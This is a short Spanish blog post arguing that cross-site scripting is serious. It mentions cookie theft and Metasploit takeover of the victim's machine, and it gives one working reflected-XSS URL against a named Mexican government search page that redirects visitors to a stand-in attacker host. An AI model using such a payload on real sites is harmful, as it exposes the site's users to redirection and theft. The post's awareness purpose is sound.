por que tanto Xss o Cross Site Scripting??
Son muchas las cosas que puede hacer con un Xss, desde obtener una cookie, infectar, redireccionar a una web maliciosa, etc.
Pero hay algo mas que se puede hacer, como en este caso poder tener acceso al equipo de la victima y tener un control total de ella.
Esto es muy sencillo con el simple uso de Metasploit, en este caso no voy a dar mas explicaciones de como hacer esto, ya que es algo sencillo:
Simplemente ingresando un codigo a la url:
http://www.ifai.org.mx/buscador_ifai/buscar.do?type=all&spell=true&lemmatize=true&fuentes=4&queryStr=<script>document.location=”http://www.atacante.com”</script>
Mas que nada esto es para poder mostrar la gravedad de esta “simple falla”.
Esto principalmente afecta a los clientes de dicha web.
Advertisement
Aún no hay trackbacks